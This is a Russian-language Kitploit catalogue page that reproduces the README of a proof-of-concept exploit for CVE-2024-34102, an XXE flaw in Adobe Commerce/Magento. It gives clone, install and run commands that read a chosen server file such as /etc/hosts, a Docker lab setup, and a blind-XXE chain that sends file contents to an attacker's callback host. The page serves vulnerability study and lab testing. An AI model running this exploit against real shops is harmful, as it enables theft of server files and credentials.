Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34102 — Adobe Commerce XXE эксплойт | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2024-34102
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubeqstlab/cve-2024-34102

CVE-2024-34102

Adobe Commerce XXE эксплойт

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-34102

★ Благодарим @th3gokul, Sanjaith3hacker, Chocapikk за исходную кодовую базу. ★

Описание

CVE-2024-34102 : уязвимость XXE в Adobe Commerce описание: Adobe Commerce версии 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 и более ранние затронуты уязвимостью, связанной с неправильным ограничением ссылок на внешние XML-сущности (XXE), что может привести к выполнению произвольного кода. Атакующий может воспользоваться этой уязвимостью, отправив специально сформированный XML-документ, который ссылается на внешние сущности. Эксплуатация этой проблемы не требует взаимодействия с пользователем.

Как использовать

Клонирование через Git

root@kitploit:~
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102

Установка пакетов

root@kitploit:~
pip install -r requirements.txt

Команда

root@kitploit:~
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>

Пример

root@kitploit:~
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Результат

изображение

Уязвимое окружение на базе Docker

Благодаря Docker-конфигурации Magento от markshust создать уязвимую среду разработки несложно. https://github.com/markshust/docker-magento

root@kitploit:~
# Create your project directory then go into it:
mkdir /opt/magento
cd $_

# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl

# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/

# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.

# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

изображение

PHPSTORM

Вы можете отлаживать Magento с помощью PHPSTORM.

1. Включите xdebug следующей командой:

root@kitploit:~
bin/xdebug enable

2. Затем настройте PHPSTORM следующим образом:

изображение

..И затем вы можете отлаживать Magento.

Сценарий атаки

Создать callback URL (mocky api) -> Слепая XXE-атака (CVE-2024-34102) -> Отправить содержимое файла в экземпляр атакующего (SSRFUtility) -> Прочитать экземпляр атакующего (SSRFUtility)

Отказ от ответственности

Этот репозиторий не предназначен для эксплуатации XXE в CVE-2024-34102. Цель проекта — помочь людям изучить эту уязвимость и, возможно, протестировать свои собственные приложения.

Аналитика EQST

Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями. https://www.skshieldus.com/eng/business/insight.do

Скачать инструмент